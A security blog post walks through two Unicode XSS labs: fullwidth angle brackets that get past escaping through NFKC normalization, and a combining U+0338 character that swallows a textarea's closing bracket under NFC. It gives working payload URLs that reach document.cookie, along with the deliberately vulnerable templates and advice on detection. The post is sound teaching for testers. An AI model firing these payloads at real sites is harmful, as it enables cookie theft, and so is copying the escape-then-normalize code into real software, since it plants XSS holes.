Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:
GET /target.ftl?name=foo<i>bar HTTP/2
Host: 4t64ubva.xssy.uk
...
HTTP/2 200 OK
Content-Length: 359
...
<h1>Unicode XSS</h1>
<p>Hello foo&lt;i&gt;bar</p>
</body>
This would generally indicate that XSS is not possible. However, let’s try the Unicode XSS technique. Instead of a regular less-than sign, we want to use the Unicode fullwidth-less-than-sign, which is U+FF1C. To use this within a GET parameter, we need to UTF-8 encode and then URL encode the character, and we can use a quick bit of Python to do so:
>>> import urllib.parse
>>> '\uFF1C'
'＜'
>>> '\uFF1C'.encode('utf-8')
b'\xef\xbc\x9c'
>>> urllib.parse.quote('\uFF1C'.encode('utf-8'))
'%EF%BC%9C'
Now we can send our payload and observe the result:
GET /target.ftl?name=%EF%BC%9C HTTP/2
Host: 4t64ubva.xssy.uk
...
HTTP/2 200 OK
Content-Length: 345
...
<h1>Unicode XSS</h1>
<p>Hello <</p>
</body>
Interestingly, the Unicode character has been converted to a regular less-than sign, and this has avoided HTML escaping. This is a strong indicator of XSS, and we can construct a payload that will call alert(document.cookie). The full payload is:
https://4t64ubva.xssy.uk/target.ftl?name=%EF%BC%9Cscript%EF%BC%9Ealert(document.cookie)%EF%BC%9C/script%EF%BC%9E
Visiting this URL results in a browser popup, demonstrating successful exploitation.
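The payload URL above can also be built programmatically. The following is a minimal sketch: the helper name `fullwidth_payload_url` is my own, chosen for illustration, and it assumes the target reflects a `name` query parameter as the lab does.

```python
import urllib.parse

# Fullwidth counterparts of the angle brackets (U+FF1C and U+FF1E).
FULLWIDTH = str.maketrans({'<': '\uFF1C', '>': '\uFF1E'})


def fullwidth_payload_url(base_url, html):
    """Swap < and > for fullwidth forms, then UTF-8 and URL encode (hypothetical helper)."""
    swapped = html.translate(FULLWIDTH)
    # Keep '/', '(' and ')' literal so the result matches the hand-built URL.
    encoded = urllib.parse.quote(swapped.encode('utf-8'), safe='/()')
    return base_url + '?name=' + encoded


url = fullwidth_payload_url(
    'https://4t64ubva.xssy.uk/target.ftl',
    '<script>alert(document.cookie)</script>',
)
print(url)
```

Leaving the parentheses unencoded is only a readability choice; percent-encoding them should work equally well.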
Now that we have an exploit, the obvious question is: why is this vulnerable? Here is the source code to target.ftl:
<html>
<head><title>Unicode XSS</title></head>
<body>
<h1>Unicode XSS</h1>
<p>Hello ${normalizeNFKC(request.queryParameters.name!?html)}</p>
</body>
</html>
What is happening is that the application first performs HTML escaping, using the ?html FreeMarker built-in. Then it calls normalizeNFKC, which performs Unicode normalization. The NFKC form is for “compatibility composition” and replaces some characters with near-enough alternatives, including replacing fullwidth forms with their regular counterparts. Because normalization runs after escaping, the regular less-than sign it produces is never escaped.
When this occurs in the wild, it is normally due to a framework component performing normalization. One example of this is SQL Server, which automatically applies normalization when a Unicode string is stored in a VARCHAR column.
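The ordering problem in target.ftl can be reproduced outside FreeMarker. This is a rough Python model, assuming `html.escape` is a reasonable stand-in for ?html and `unicodedata.normalize` for the lab's normalizeNFKC; the function names are mine and are not part of the lab.

```python
import html
import unicodedata


def render_vulnerable(name):
    # Mirrors the template's order: escape first, normalize afterwards.
    return unicodedata.normalize('NFKC', html.escape(name))


def render_safer(name):
    # Normalize first so that escaping sees the final characters.
    return html.escape(unicodedata.normalize('NFKC', name))


payload = '\uFF1Cscript\uFF1Ealert(1)\uFF1C/script\uFF1E'
print(render_vulnerable(payload))
print(render_safer(payload))
```

The first call emits a live script tag, while the second emits escaped text. The general point is that escaping should be the last transformation applied before output.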
One approach to detection is to include a fullwidth-less-than-sign payload in a scan. Some scanners include this payload; some do not. Although the vulnerability is rare, it is probably worth including. In my Coding Burp Extensions workshop, I cover writing a custom Burp scanner check for this issue.
Another approach is to detect Unicode normalization, and report this as interesting behaviour for manual investigation. It’s possible that normalization is taking place, but in a way that’s not vulnerable to XSS, or not vulnerable to this exact payload.
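Both detection approaches come down to sending a probe and classifying how it comes back. The sketch below shows only that classification step, with no HTTP client or scanner API involved. The function names and the result labels are hypothetical, and a real check would also need to handle other escaping styles, such as numeric entities.

```python
def make_probe(marker):
    """Wrap a fullwidth less-than sign in a marker so it can be found in the response."""
    return marker + '\uFF1C' + marker


def classify_reflection(body, marker):
    """Report how the probe came back (hypothetical labels)."""
    if marker + '<' + marker in body:
        return 'normalized-unescaped'   # candidate for XSS
    if marker + '&lt;' + marker in body:
        return 'normalized-escaped'     # normalized, then escaped: worth a manual look
    if marker + '\uFF1C' + marker in body:
        return 'reflected-unchanged'    # no compatibility normalization seen
    return 'not-reflected'


print(make_probe('zq9x'))
print(classify_reflection('<p>Hello zq9x<zq9x</p>', 'zq9x'))
```

A short random marker keeps the match from colliding with characters that are already on the page.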
Lab: https://ozb2apmi.xssy.uk/
We can start by attempting the payload from the previous lab:
GET /target.ftl?name=%EF%BC%9Cscript%EF%BC%9Ealert(document.cookie)%EF%BC%9C/script%EF%BC%9E HTTP/2
Host: ozb2apmi.xssy.uk
...
HTTP/2 200 OK
Content-Length: 489
...
Enter your name:
<textarea name="name">＜script＞alert(document.cookie)＜/script＞</textarea>
The less-than and greater-than characters are the Unicode fullwidth characters, without any transformation. No browser interprets that as an HTML tag, so this payload can't inject script.
Let’s try to identify if any Unicode normalization is occurring. We’ll start by using Python to explore how NFC and NFD work. A simple character to use is latin-capital-a-with-acute - U+00C1.
>>> import unicodedata
>>> unicodedata.normalize('NFD', '\u00C1')
'Á'
>>> len(unicodedata.normalize('NFD', '\u00C1'))
2
>>> hex(ord(unicodedata.normalize('NFD', '\u00C1')[0]))
'0x41'
>>> hex(ord(unicodedata.normalize('NFD', '\u00C1')[1]))
'0x301'
We can see that NFD breaks this character into two: latin-capital-a, and combining-acute-accent. NFC does the opposite:
>>> unicodedata.normalize('NFC', '\u0041\u0301')
'Á'
>>> len(unicodedata.normalize('NFC', '\u0041\u0301'))
1
We can probe the application by including these sequences in a payload, bearing in mind we need to UTF-8 and URL encode the characters:
>>> urllib.parse.quote('\u00c1 \u0041\u0301'.encode('utf-8'))
'%C3%81%20A%CC%81'
GET /target.ftl?name=%C3%81%20A%CC%81 HTTP/2
Host: ozb2apmi.xssy.uk
HTTP/2 200 OK
Content-Length: 447
...
Enter your name:
<textarea name="name">Á Á</textarea>
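If we look at the hex source, we can see that both characters are encoded as C3 81, which is the UTF-8 encoding of latin-capital-a-with-acute. NFKC would produce the same result, but the fullwidth characters in the previous response came back unchanged, which rules it out. So we can infer that the application has normalized the data using NFC.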
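The same inference can be automated by choosing a probe that every normalization form transforms differently. This is a sketch under my own assumptions: the probe string and the helper name `guess_normalization` are illustrative, and it assumes the echoed probe has already been cut out of the response and decoded from UTF-8.

```python
import unicodedata

# A precomposed character, a decomposed sequence, and a fullwidth letter.
PROBE = '\u00C1' + 'A\u0301' + '\uFF21'


def guess_normalization(echoed):
    """Return the normalization forms whose output matches the echoed probe."""
    if echoed == PROBE:
        return []  # the probe came back untouched
    return [form for form in ('NFC', 'NFD', 'NFKC', 'NFKD')
            if unicodedata.normalize(form, PROBE) == echoed]


# What the second lab would echo if it behaves as observed above.
print(guess_normalization('\u00C1\u00C1\uFF21'))
```

The fullwidth letter is what separates NFC from NFKC, and the precomposed/decomposed pair is what separates the composing forms from the decomposing ones.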
We can also see that our payload appears immediately after the closing greater-than character of the opening textarea tag. So, is there any combining character that will combine with a greater-than character? We can use some Python to search for this:
>>> for i in range(65535):
...     q = unicodedata.normalize('NFC', '>' + chr(i))
...     if not q.startswith('>'):
...         print(hex(i))
...
0x338
And there is a match: U+0338, combining-long-solidus-overlay. Under NFC, a greater-than sign followed by this character composes into U+226F, not-greater-than (≯). Let’s try sending this to the application:
GET /target.ftl?name=%CC%B8 HTTP/2
Host: ozb2apmi.xssy.uk
...
Enter your name:
<textarea name="name"≯</textarea>
The Gist doesn't render the response quite right, but what is happening is that the terminating greater-than character of the textarea tag has been replaced with another character. This means that the user-supplied input is being injected in a tag context.
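The search above can be widened to other characters that matter in HTML. The sketch below repeats it for less-than and equals as well; the helper name `composing_marks` is mine, and like the original search it covers only the Basic Multilingual Plane.

```python
import unicodedata


def composing_marks(base, limit=0x10000):
    """Return code points that NFC merges into `base` (BMP only by default)."""
    found = []
    for cp in range(limit):
        if 0xD800 <= cp <= 0xDFFF:
            continue  # skip surrogates, which are not characters
        if not unicodedata.normalize('NFC', base + chr(cp)).startswith(base):
            found.append(cp)
    return found


for ch in '<=>':
    for cp in composing_marks(ch):
        merged = unicodedata.normalize('NFC', ch + chr(cp))
        print(repr(ch), hex(cp), '->', 'U+%04X' % ord(merged[0]))
```

As far as I am aware, U+0338 also composes with less-than and equals (giving U+226E and U+2260), so a payload placed directly after either of those characters could swallow it in the same way.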
We can use an onfocus handler, coupled with the autofocus attribute, to execute script without requiring user interaction.
https://ozb2apmi.xssy.uk/target.ftl?name=%CC%B8+onfocus="alert(document.cookie)"+autofocus>
Visiting this URL results in a browser popup, demonstrating successful exploitation.
The source code to target.ftl is:
<html>
<head><title>Unicode XSS 2</title></head>
<body>
<h1>Unicode XSS 2</h1>
<form action="target.ftl">Enter your name:
${normalizeNFC("<textarea name=\"name\">" + request.queryParameters.name!?replace("<", "&lt;") + "</textarea>")}
<input type="submit"/>
</form>
</body>
</html>
This has been crafted with certain features to aid exploitation. For example, only less-than is escaped, not greater-than, which lets us supply our own greater-than to close the textarea tag and keep the markup valid. Also, the user input is concatenated with the surrounding tags before normalization, which is what allows the combining character to merge with the tag's own greater-than. Still, it is not entirely implausible that an exploitable variant could be found in the wild.
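To make the role of those two features concrete, here is a rough Python model of the template alongside a safer variant. It assumes `unicodedata.normalize` behaves like the lab's normalizeNFC and uses `html.escape` as a stand-in for full HTML escaping; the function names are mine, not the lab's.

```python
import html
import unicodedata

OPEN_TAG = '<textarea name="name">'
CLOSE_TAG = '</textarea>'


def render_vulnerable(name):
    # Mirrors the lab: partial escaping, then NFC over markup and input together.
    escaped = name.replace('<', '&lt;')
    return unicodedata.normalize('NFC', OPEN_TAG + escaped + CLOSE_TAG)


def render_safer(name):
    # Normalize only the input, escape it fully, and leave the markup untouched.
    return OPEN_TAG + html.escape(unicodedata.normalize('NFC', name)) + CLOSE_TAG


payload = '\u0338 onfocus="alert(document.cookie)" autofocus>'
print(render_vulnerable(payload))
print(render_safer(payload))
```

In the safer variant the tag's greater-than survives and the quotes are escaped, so the input stays inside the textarea as text. The output still contains a greater-than followed by U+0338, though, so a later component that normalizes the whole page could reintroduce the problem.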
The Unicode combining character XSS is probably so niche that it's not worth including as a payload in regular scanning. However, the detection of Unicode normalization and the flagging of such behaviour for manual analysis is worthwhile.
I hope you enjoyed reading about this technique and can potentially put it to use some day. There is a lab on XSSy for a third variant of Unicode XSS, which I will blog about some day.